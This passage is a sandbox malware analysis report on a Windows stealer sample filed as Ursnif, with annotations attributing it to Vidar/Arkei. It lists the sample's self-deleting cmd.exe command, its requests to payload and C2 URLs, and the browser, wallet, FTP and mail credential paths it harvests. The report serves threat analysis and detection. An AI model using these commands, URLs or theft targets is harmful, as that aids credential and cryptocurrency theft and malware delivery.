
Ursnif_6cc70fb7b014fe253989338d5008381d_exe_2019-07-22_19_30.txt

  1.  
  2. * MalFamily: "Ursnif"  (family label taken from the submitted file name; note that the only network signature in this report — "ET TROJAN Vidar/Arkei Stealer Client Data Upload" — and the observed behaviour (download of NSS/VC-runtime DLLs into C:\ProgramData, a random-named staging directory with passwords.txt, Wallets\, screenshot.jpg and information.txt, then deletion of the staged files) are consistent with the Vidar/Arkei stealer rather than Ursnif; treat the family attribution as unconfirmed)
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Ursnif_6cc70fb7b014fe253989338d5008381d.exe"
  7. * File Size: 664576
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "83502653aa68b492d6382416ecc27a7350be45968211f117ab2a860fb5fe093d"
  10. * MD5: "6cc70fb7b014fe253989338d5008381d"
  11. * SHA1: "eaab87820e5da8b64eb2d2bc2e2bbbac3a43130f"
  12. * SHA512: "e4dbdaaac28eeb15ea6cbd3554090f2883a4a905681269ac72380480d9cc51dc2f079ba7fc37bfe8534d94ffd0629e8bfbcc6c45980ed0300aae9369ad72f01a"
  13. * CRC32: "2349236C"
  14. * SSDEEP: "12288:EGolQnTahriSgWOGi80bfjPpBGxP7+BubZa3BR/mLV09J569buuKa1:EGR+hriSgUi80DOxVa3mLuJ569Cub1"
  15.  
  16. * Process Execution:
  17.     "Ursnif_6cc70fb7b014fe253989338d5008381d.exe",
  18.     "cmd.exe",
  19.     "taskkill.exe",
  20.     "services.exe",
  21.     "svchost.exe",
  22.     "WmiPrvSE.exe",
  23.     "taskhost.exe",
  24.     "sc.exe",
  25.     "svchost.exe",
  26.     "svchost.exe",
  27.     "WerFault.exe",
  28.     "wermgr.exe"
  29.  
  30.  
  31. * Executed Commands:
  32.     "C:\\ProgramData\\JCXFRDIE2I.exe ",
  33.     "C:\\Windows\\System32\\cmd.exe /c taskkill /im Ursnif_6cc70fb7b014fe253989338d5008381d.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\Ursnif_6cc70fb7b014fe253989338d5008381d.exe & exit",
  34.     "C:\\Windows\\system32\\lsass.exe",
  35.     "taskhost.exe $(Arg0)",
  36.     "C:\\Windows\\system32\\sc.exe start w32time task_started",
  37.     "C:\\Windows\\system32\\svchost.exe -k LocalService",
  38.     "C:\\Windows\\system32\\svchost.exe -k netsvcs",
  39.     "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
  40.     "taskkill  /im Ursnif_6cc70fb7b014fe253989338d5008381d.exe /f",
  41.     "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
  42.     "C:\\Windows\\system32\\WerFault.exe -u -p 2776 -s 288",
  43.     "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\""
  44.  
  45.  
  46. * Signatures Detected:
  47.    
  48.         "Description": "At least one process apparently crashed during execution",
  49.         "Details":
  50.    
  51.    
  52.         "Description": "Creates RWX memory",
  53.         "Details":
  54.    
  55.    
  56.         "Description": "A process attempted to delay the analysis task.",
  57.         "Details":
  58.            
  59.                 "Process": "WmiPrvSE.exe tried to sleep 360 seconds, actually delayed analysis time by 0 seconds"
  60.            
  61.        
  62.    
  63.    
  64.         "Description": "A process created a hidden window",
  65.         "Details":
  66.            
  67.                 "Process": "Ursnif_6cc70fb7b014fe253989338d5008381d.exe -> C:\\ProgramData\\JCXFRDIE2I.exe"
  68.            
  69.            
  70.                 "Process": "Ursnif_6cc70fb7b014fe253989338d5008381d.exe -> C:\\Windows\\System32\\cmd.exe"
  71.            
  72.        
  73.    
  74.    
  75.         "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  76.         "Details":
  77.            
  78.                 "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  79.            
  80.            
  81.                 "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
  82.            
  83.            
  84.                 "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  85.            
  86.            
  87.                 "suspicious_request": "http://otnet.xyz/141"
  88.            
  89.            
  90.                 "suspicious_request": "http://otnet.xyz/freebl3.dll"
  91.            
  92.            
  93.                 "suspicious_request": "http://otnet.xyz/freebl3.dll?ddosprotected=1"
  94.            
  95.            
  96.                 "suspicious_request": "http://otnet.xyz/mozglue.dll"
  97.            
  98.            
  99.                 "suspicious_request": "http://otnet.xyz/msvcp140.dll"
  100.            
  101.            
  102.                 "suspicious_request": "http://otnet.xyz/nss3.dll"
  103.            
  104.            
  105.                 "suspicious_request": "http://otnet.xyz/softokn3.dll"
  106.            
  107.            
  108.                 "suspicious_request": "http://otnet.xyz/vcruntime140.dll"
  109.            
  110.            
  111.                 "suspicious_request": "http://ip-api.com/line/"   (ip-api.com is a legitimate public IP-geolocation service, commonly queried by stealers for victim profiling; it is not a C2 indicator on its own and should not be blocked as one)
  112.            
  113.            
  114.                 "suspicious_request": "http://otnet.xyz/"
  115.            
  116.            
  117.                 "suspicious_request": "http://bookyeti.com/img/3001.exe"
  118.            
  119.        
  120.    
  121.    
  122.         "Description": "Performs some HTTP requests",
  123.         "Details":
  124.            
  125.                 "url": "http://otnet.xyz/141"
  126.            
  127.            
  128.                 "url": "http://otnet.xyz/freebl3.dll"
  129.            
  130.            
  131.                 "url": "http://otnet.xyz/freebl3.dll?ddosprotected=1"
  132.            
  133.            
  134.                 "url": "http://otnet.xyz/mozglue.dll"
  135.            
  136.            
  137.                 "url": "http://otnet.xyz/msvcp140.dll"
  138.            
  139.            
  140.                 "url": "http://otnet.xyz/nss3.dll"
  141.            
  142.            
  143.                 "url": "http://otnet.xyz/softokn3.dll"
  144.            
  145.            
  146.                 "url": "http://otnet.xyz/vcruntime140.dll"
  147.            
  148.            
  149.                 "url": "http://ip-api.com/line/"
  150.            
  151.            
  152.                 "url": "http://otnet.xyz/"
  153.            
  154.            
  155.                 "url": "http://bookyeti.com/img/3001.exe"
  156.            
  157.        
  158.    
  159.    
  160.         "Description": "Deletes its original binary from disk",
  161.         "Details":
  162.    
  163.    
  164.         "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  165.         "Details":
  166.            
  167.                 "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 13574119 times"   (attributed to services.exe, a Windows system process, not to the sample; like the WmiPrvSE.exe sleep above, this is likely sandbox/OS noise following the `sc start w32time` call and should be treated as low-confidence evidence of evasion)
  168.            
  169.        
  170.    
  171.    
  172.         "Description": "Attempts to execute a binary from a dead or sinkholed URL",
  173.         "Details":
  174.            
  175.                 "dead_binary": "c:\\programdata\\jcxfrdie2i.exe"   (executed by the sample per the "Executed Commands" list above; the payload was presumably the http://bookyeti.com/img/3001.exe download, which could not be retrieved at analysis time, so the second-stage behaviour is not covered by this report)
  176.            
  177.        
  178.    
  179.    
  180.         "Description": "Steals private information from local Internet browsers",
  181.         "Details":
  182.            
  183.                 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  184.            
  185.            
  186.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\IE_Cookies.txt"
  187.            
  188.            
  189.                 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  190.            
  191.            
  192.                 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
  193.            
  194.            
  195.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Edge_Cookies.txt"
  196.            
  197.            
  198.                 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
  199.            
  200.            
  201.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Google Chrome_Default.txt"
  202.            
  203.        
  204.    
  205.    
  206.         "Description": "Collects information about installed applications",
  207.         "Details":
  208.            
  209.                 "Program": "Google Update Helper"
  210.            
  211.            
  212.                 "Program": "Microsoft Excel MUI  2013"
  213.            
  214.            
  215.                 "Program": "Microsoft Outlook MUI  2013"
  216.            
  217.            
  218.            
  219.            
  220.                 "Program": "Google Chrome"
  221.            
  222.            
  223.                 "Program": "Adobe Flash Player 29 NPAPI"
  224.            
  225.            
  226.                 "Program": "Adobe Flash Player 29 ActiveX"
  227.            
  228.            
  229.                 "Program": "Microsoft DCF MUI  2013"
  230.            
  231.            
  232.                 "Program": "Microsoft Access MUI  2013"
  233.            
  234.            
  235.                 "Program": "Microsoft Office Proofing Tools 2013 - English"
  236.            
  237.            
  238.                 "Program": "Adobe Acrobat Reader DC"
  239.            
  240.            
  241.                 "Program": "Microsoft Office Proofing Tools 2013 - Español"
  242.            
  243.            
  244.                 "Program": "Microsoft Publisher MUI  2013"
  245.            
  246.            
  247.                 "Program": "Outils de vérification linguistique 2013 de Microsoft Office - Français"
  248.            
  249.            
  250.                 "Program": "Microsoft Office Shared MUI  2013"
  251.            
  252.            
  253.                 "Program": "Microsoft Office OSM MUI  2013"
  254.            
  255.            
  256.                 "Program": "Microsoft InfoPath MUI  2013"
  257.            
  258.            
  259.                 "Program": "Microsoft Office Shared Setup Metadata MUI  2013"
  260.            
  261.            
  262.                 "Program": "Microsoft Word MUI  2013"
  263.            
  264.            
  265.                 "Program": "Microsoft Groove MUI  2013"
  266.            
  267.            
  268.            
  269.            
  270.                 "Program": "Microsoft Access Setup Metadata MUI  2013"
  271.            
  272.            
  273.                 "Program": "Microsoft Office OSM UX MUI  2013"
  274.            
  275.            
  276.                 "Program": "Java Auto Updater"
  277.            
  278.            
  279.                 "Program": "Microsoft PowerPoint MUI  2013"
  280.            
  281.            
  282.                 "Program": "Microsoft Office Professional Plus 2013"
  283.            
  284.            
  285.                 "Program": "Adobe Refresh Manager"
  286.            
  287.            
  288.                 "Program": "Microsoft Office Proofing  2013"
  289.            
  290.            
  291.                 "Program": "Microsoft Lync MUI  2013"
  292.            
  293.            
  294.            
  295.            
  296.                 "Program": "Microsoft OneNote MUI  2013"
  297.            
  298.        
  299.    
  300.    
  301.         "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
  302.         "Details":
  303.    
  304.    
  305.         "Description": "Checks the system manufacturer, likely for anti-virtualization",
  306.         "Details":
  307.    
  308.    
  309.         "Description": "Attempts to access Bitcoin/ALTCoin wallets",
  310.         "Details":
  311.            
  312.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\*.dat"
  313.            
  314.            
  315.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\??"
  316.            
  317.            
  318.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Bitcoin\\\\xe1\\x93\\x9d\\xe7\\x95\\x8b"
  319.            
  320.            
  321.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Bitcoin\\*.*"
  322.            
  323.            
  324.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\default_wallet"
  325.            
  326.            
  327.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Electrum\\*.*"
  328.            
  329.            
  330.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\"
  331.            
  332.            
  333.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Electrum\\"
  334.            
  335.            
  336.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\"
  337.            
  338.            
  339.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Litecoin\\*.*"
  340.            
  341.            
  342.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Litecoin\\"
  343.            
  344.            
  345.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\*.dat"
  346.            
  347.            
  348.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\NameCoin\\"
  349.            
  350.            
  351.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\"
  352.            
  353.            
  354.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\NameCoin\\*.*"
  355.            
  356.            
  357.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\*.dat"
  358.            
  359.            
  360.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\*.dat"
  361.            
  362.            
  363.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\TerraCoin\\"
  364.            
  365.            
  366.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\TerraCoin\\*.*"
  367.            
  368.            
  369.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\"
  370.            
  371.            
  372.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\PrimeCoin\\*.*"
  373.            
  374.            
  375.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\"
  376.            
  377.            
  378.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\*.dat"
  379.            
  380.            
  381.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\PrimeCoin\\"
  382.            
  383.            
  384.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\*.dat"
  385.            
  386.            
  387.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FreiCoin\\*.*"
  388.            
  389.            
  390.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\"
  391.            
  392.            
  393.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FreiCoin\\"
  394.            
  395.            
  396.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DevCoin\\"
  397.            
  398.            
  399.                 "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\"
  400.            
  401.            
  402.                 "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\*.dat"
  403.            
  404.            
  405.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DevCoin\\*.*"
  406.            
  407.            
  408.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\*.dat"
  409.            
  410.            
  411.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Franko\\*.*"
  412.            
  413.            
  414.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Franko\\"
  415.            
  416.            
  417.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\"
  418.            
  419.            
  420.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\*.dat"
  421.            
  422.            
  423.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MegaCoin\\"
  424.            
  425.            
  426.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MegaCoin\\*.*"
  427.            
  428.            
  429.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\"
  430.            
  431.            
  432.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\InfiniteCoin\\*.*"
  433.            
  434.            
  435.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\*.dat"
  436.            
  437.            
  438.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\"
  439.            
  440.            
  441.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\InfiniteCoin\\"
  442.            
  443.            
  444.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IxCoin\\*.*"
  445.            
  446.            
  447.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IxCoin\\"
  448.            
  449.            
  450.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\"
  451.            
  452.            
  453.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\*.dat"
  454.            
  455.            
  456.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Anoncoin\\*.*"
  457.            
  458.            
  459.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\"
  460.            
  461.            
  462.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\*.dat"
  463.            
  464.            
  465.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Anoncoin\\"
  466.            
  467.            
  468.                 "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\*.dat"
  469.            
  470.            
  471.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\BBQCoin\\"
  472.            
  473.            
  474.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\BBQCoin\\*.*"
  475.            
  476.            
  477.                 "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\"
  478.            
  479.            
  480.                 "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\*.dat"
  481.            
  482.            
  483.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DigitalCoin\\"
  484.            
  485.            
  486.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DigitalCoin\\*.*"
  487.            
  488.            
  489.                 "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\"
  490.            
  491.            
  492.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\*.dat"
  493.            
  494.            
  495.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MinCoin\\"
  496.            
  497.            
  498.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MinCoin\\*.*"
  499.            
  500.            
  501.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\"
  502.            
  503.            
  504.                 "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\*.dat"
  505.            
  506.            
  507.                 "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\"
  508.            
  509.            
  510.                 "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\*.dat"
  511.            
  512.            
  513.                 "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\"
  514.            
  515.            
  516.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\YACoin\\"
  517.            
  518.            
  519.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\YACoin\\*.*"
  520.            
  521.            
  522.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\*.dat"
  523.            
  524.            
  525.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FlorinCoin\\*.*"
  526.            
  527.            
  528.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\"
  529.            
  530.            
  531.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FlorinCoin\\"
  532.            
  533.        
  534.    
  535.    
  536.         "Description": "Harvests credentials from local FTP client softwares",
  537.         "Details":
  538.            
  539.                 "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
  540.            
  541.        
  542.    
  543.    
  544.         "Description": "Harvests information related to installed instant messenger clients",
  545.         "Details":
  546.            
  547.                 "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  548.            
  549.        
  550.    
  551.    
  552.         "Description": "Harvests information related to installed mail clients",
  553.         "Details":
  554.            
  555.                 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003"
  556.            
  557.            
  558.                 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000007"
  559.            
  560.            
  561.                 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000006"
  562.            
  563.            
  564.                 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000005"
  565.            
  566.            
  567.                 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000004"
  568.            
  569.            
  570.                 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000009"
  571.            
  572.            
  573.                 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000008"
  574.            
  575.        
  576.    
  577.    
  578.         "Description": "Collects information to fingerprint the system",
  579.         "Details":
  580.    
  581.    
  582.         "Description": "Created network traffic indicative of malicious activity",
  583.         "Details":
  584.            
  585.                 "signature": "ET TROJAN Vidar/Arkei Stealer Client Data Upload"
  586.            
  587.        
  588.    
  589.  
  590.  
  591. * Started Service:
  592.     "VaultSvc",
  593.     "WerSvc",
  594.     "W32Time"
  595.  
  596.  
  597. * Mutexes:
  598.     "00000000-0000-0000-0000-0000000000003d3783a0-703a-11de-8c7a-806e6f6e6963",
  599.     "Local\\WERReportingForProcess2776",
  600.     "Global\\\\xe5\\x88\\x90\\xc2\\x90",
  601.     "Global\\\\xed\\x95\\xb02",
  602.     "WERUI_BEX64-eb71ef964c95de5826f5dbf6417783430b96dd1"
  603.  
  604.  
  605. * Modified Files:
  606.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\passwords.txt",
  607.     "C:\\ProgramData\\freebl3.dll",
  608.     "C:\\ProgramData\\mozglue.dll",
  609.     "C:\\ProgramData\\msvcp140.dll",
  610.     "C:\\ProgramData\\nss3.dll",
  611.     "C:\\ProgramData\\softokn3.dll",
  612.     "C:\\ProgramData\\vcruntime140.dll",
  613.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\ld",
  614.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\historych",
  615.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\History\\Google Chrome_Default.txt",
  616.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Downloads\\Google Chrome_Default.txt",
  617.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\c",
  618.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Google Chrome_Default.txt",
  619.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\wd",
  620.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Autofill\\Google Chrome_Default.txt",
  621.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\CC\\Google Chrome_Default.txt",
  622.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Soft\\Authy\\\\xec\\x90\\xa0\\xcd\\xb2\\xe0\\xb8\\xa8\\xc7\\x8b\\xeb\\x86\\x88\\xc7\\xb2\\xe9\\x95\\xb0\\xc8\\x83",
  623.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\IE_Cookies.txt",
  624.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Edge_Cookies.txt",
  625.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\cookie_list.txt",
  626.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\outlook.txt",
  627.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\information.txt",
  628.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Files\\Default.zip",
  629.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Bitcoin\\\\xe1\\x93\\x9d\\xe7\\x95\\x8b",
  630.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Ethereum\\",
  631.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Electrum\\",
  632.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\ElectrumLTC\\\r",
  633.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Exodus\\",
  634.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\ElectronCash\\\r",
  635.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MultiDoge\\",
  636.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Zcash\\",
  637.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DashCore\\",
  638.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Litecoin\\",
  639.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Anoncoin\\",
  640.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\BBQCoin\\",
  641.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DevCoin\\",
  642.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DigitalCoin\\",
  643.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FlorinCoin\\",
  644.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Franko\\",
  645.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FreiCoin\\",
  646.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\GoldCoinGLD\\",
  647.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\InfiniteCoin\\",
  648.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IOCoin\\",
  649.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IxCoin\\",
  650.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MegaCoin\\",
  651.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MinCoin\\",
  652.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\NameCoin\\",
  653.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\PrimeCoin\\",
  654.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\TerraCoin\\",
  655.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\YACoin\\",
  656.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\JAXX\\\r",
  657.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\screenshot.jpg",
  658.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\CA_00000000-0000-0000-0000-0000000000009437374709.zip",
  659.     "C:\\ProgramData\\JCXFRDIE2I.exe",
  660.     "C:\\ProgramData\\JCXFRDIE2I.exe:Zone.Identifier",
  661.     "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
  662.     "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
  663.     "C:\\Windows\\sysnative\\LogFiles\\Scm\\16379d62-d2d1-45c7-a48c-f33b02ea0429",
  664.     "\\??\\PIPE\\lsarpc",
  665.     "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBC62.tmp.appcompat.txt",
  666.     "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFBE.tmp.WERInternalMetadata.xml",
  667.     "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFDE.tmp.hdmp",
